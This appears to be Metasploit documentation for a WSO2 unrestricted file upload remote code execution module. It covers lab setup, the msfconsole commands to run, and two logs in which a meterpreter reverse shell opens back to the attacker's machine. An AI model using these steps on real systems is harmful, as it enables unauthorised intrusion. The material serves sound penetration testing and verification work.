## Vulnerable Application Certain WSO2 products allow unrestricted file upload with resultant remote code execution. This affects WSO2 API Manager 2.2.0 and above through 4.0.0; WSO2 Identity Server 5.2.0 and above through 5.11.0; WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, and 5.6.0; WSO2 Identity Server as Key Manager 5.3.0 and above through 5.10.0; and WSO2 Enterprise Integrator 6.2.0 and above through 6.6.0. Download WSO2 API Manager [4.0.0](https://wso2.com/api-management/previous-releases/) or another version < 4.1.0 from the same link. Download and install [JDK 1.8](https://www.oracle.com/ca-en/java/technologies/javase/javase8u211-later-archive-downloads.html) and set `$JAVA_HOME` in your environment. Start the vulnerable application with `./wso2am-4.0.0/bin/api-manager.sh`. More information on target setup can be found [here](https://apim.docs.wso2.com/en/latest/install-and-setup/install-and-setup-overview/). ## Verification Steps 1. Install the application 1. Start msfconsole 1. Do: `use multi/http/wso2_file_upload_rce` 1. Do: `set rhosts [ip]` 1. Do: `set lhost [ip]` 1. Do: `run` 1. You should get a shell. ## Scenarios ### WSO2 API Manager 4.0.0 on Ubuntu 20.04.1 ``` msf6 > use multi/http/wso2_file_upload_rce [*] Using configured payload java/meterpreter/reverse_tcp msf6 exploit(multi/http/wso2_file_upload_rce) > set rhosts 172.16.199.173 rhosts => 172.16.199.173 msf6 exploit(multi/http/wso2_file_upload_rce) > set lhost 172.16.199.1 lhost => 172.16.199.1 msf6 exploit(multi/http/wso2_file_upload_rce) > check [*] 172.16.199.173:9443 - The target appears to be vulnerable. msf6 exploit(multi/http/wso2_file_upload_rce) > run [*] Started reverse TCP handler on 172.16.199.1:4444 [*] Preparing payload... [*] Uploading payload... [+] Payload uploaded successfully [*] Executing payload... [*] Waiting for shell... [*] Waiting for shell... [*] Waiting for shell... [*] Waiting for shell... [*] Sending stage (58851 bytes) to 172.16.199.173 [*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.173:34282 ) at 2022-04-26 10:58:31 -0700 meterpreter > getuid Server username: msfuser meterpreter > sysinfo Computer : ubuntu OS : Linux 5.13.0-40-generic (amd64) Architecture : x64 System Language : en_US Meterpreter : java/linux ``` ### WSO2 API Manager 3.0.0 on Ubuntu 20.04.1 ``` msf6 > use multi/http/wso2_file_upload_rce msf6 exploit(multi/http/wso2_file_upload_rce) > set rhosts 172.16.199.173 rhosts => 172.16.199.173 msf6 exploit(multi/http/wso2_file_upload_rce) > set lhost 172.16.199.1 lhost => 172.16.199.1 msf6 exploit(multi/http/wso2_file_upload_rce) > check [*] 172.16.199.173:9443 - The target appears to be vulnerable. msf6 exploit(multi/http/wso2_file_upload_rce) > run [*] Started reverse TCP handler on 172.16.199.1:4444 [*] Preparing payload... [*] Uploading payload... [+] Payload uploaded successfully [*] Executing payload... [*] Waiting for shell... [*] Waiting for shell... [*] Waiting for shell... [*] Waiting for shell... [*] Sending stage (58851 bytes) to 172.16.199.173 [*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.173:33564 ) at 2022-04-26 12:09:18 -0700 meterpreter > getuid Server username: msfuser meterpreter > sysinfo Computer : ubuntu OS : Linux 5.13.0-40-generic (amd64) Architecture : x64 System Language : en_US Meterpreter : java/linux ```